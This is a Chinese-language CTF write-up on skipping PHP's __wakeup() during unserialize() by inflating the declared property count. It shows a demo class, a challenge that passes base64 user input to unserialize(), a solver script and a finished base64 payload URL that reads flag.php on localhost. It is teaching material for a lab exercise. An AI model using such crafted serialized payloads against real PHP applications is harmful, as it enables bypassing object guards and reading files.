漏洞介绍
当序列化字符串中表示对象属性个数的值大于真实的属性个数时，会跳过__wakeup的执行（仅在尚未修复该问题的PHP版本上成立；对象本身仍会被创建，因此__destruct照常执行，这正是下面题目所利用的点）。
演示代码:
<?php
highlight_file(__FILE__);

/**
 * Minimal class used to show which unserialize() hooks actually run.
 * Each hook overwrites $bull with its own marker and echoes it, so the
 * script output reveals whether __wakeup() was invoked or skipped.
 */
class test
{
    public $bull;

    /** Called when the object is released; prints the "destruct" marker. */
    public function __destruct()
    {
        $this->bull = "destruct\n";
        echo $this->bull, "destruct ok!\n";
    }

    /** unserialize() hook; prints the "wake up" marker. */
    public function __wakeup()
    {
        $this->bull = "wake up\n";
        echo $this->bull, "wake up ok!\n";
    }
}

// Normal payload (declared property count matches the real one):
// $payload = 'O:4:"test":1:{s:4:"bull";s:4:"sdfz";}';
// Payload that triggers the bug: declares 2 properties while only 1 is present.
$payload = 'O:4:"test":2:{s:4:"bull";s:4:"sdfz";}';
$abc = unserialize($payload);
?>
题目
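<?php
/**
 * Challenge source. The only user input is $_GET['file']: it is base64-decoded
 * and handed straight to unserialize(), and the resulting object's __destruct()
 * decides which file is displayed. __toString() returns '' — presumably so that
 * `echo unserialize(...)` does not fail on an object.
 */
class SoFun
{
    protected $file = 'index.php';

    public function __construct($file)
    {
        $this->file = $file;
    }

    /**
     * Displays $file from this script's directory, unless the name contains
     * a backslash or a forward slash, in which case the script dies.
     */
    public function __destruct()
    {
        if (!empty($this->file)) {
            // If the file name contains '\' or '/', show an error.
            // The page's listing had "\" here, which is an unterminated string
            // literal; a single backslash is spelled '\\'.
            if (strchr($this->file, '\\') === false && strchr($this->file, '/') === false) {
                show_source(dirname(__FILE__) . '/' . $this->file);
            } else {
                die('Wrong filename.');
            }
        }
    }

    /** Resets $file on unserialize(), so a crafted payload is meant never to reach __destruct() with another name. */
    public function __wakeup()
    {
        $this->file = 'index.php';
    }

    public function __toString()
    {
        return '';
    }
}

if (!isset($_GET['file'])) {
    show_source('index.php');
} else {
    $file = base64_decode($_GET['file']);
    // NOTE(review): unserialize() on request data lets the client choose the class
    // and its property values; __wakeup() is the only guard here. Outside a CTF,
    // decode with json_decode() or at least pass ['allowed_classes' => false].
    echo unserialize($file);
}
?>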
解题:
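<?php
/**
 * Solver script: the challenge class copied verbatim, with the default
 * show_source('index.php') call disabled so the only output is the payload.
 */
class SoFun
{
    protected $file = 'index.php';

    public function __construct($file)
    {
        $this->file = $file;
    }

    /**
     * Displays $file from this script's directory, unless the name contains
     * a backslash or a forward slash, in which case the script dies.
     */
    public function __destruct()
    {
        if (!empty($this->file)) {
            // If the file name contains '\' or '/', show an error.
            // The page's listing had "\" here, which is an unterminated string
            // literal; a single backslash is spelled '\\'.
            if (strchr($this->file, '\\') === false && strchr($this->file, '/') === false) {
                show_source(dirname(__FILE__) . '/' . $this->file);
            } else {
                die('Wrong filename.');
            }
        }
    }

    /** Resets $file on unserialize(). */
    public function __wakeup()
    {
        $this->file = 'index.php';
    }

    public function __toString()
    {
        return '';
    }
}

if (!isset($_GET['file'])) {
    // show_source('index.php'); // disabled so only the payload is printed
} else {
    $file = base64_decode($_GET['file']);
    echo unserialize($file);
}

// Serialize an instance pointing at flag.php and print it base64-encoded.
// When $test is released at the end of the script, __destruct() will try to
// show_source() flag.php from this directory.
$test = new SoFun('flag.php');
echo base64_encode(serialize($test));
?>
结果:Tzo1OiJTb0Z1biI6MTp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9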
2、利用漏洞
# 把属性数量改为大于实际的属性数量（这里由 1 改为 2），再重新用 base64 编码:
Tzo1OiJTb0Z1biI6Mjp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9
3、访问URL
http://127.0.0.1/test.php?file=Tzo1OiJTb0Z1biI6Mjp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9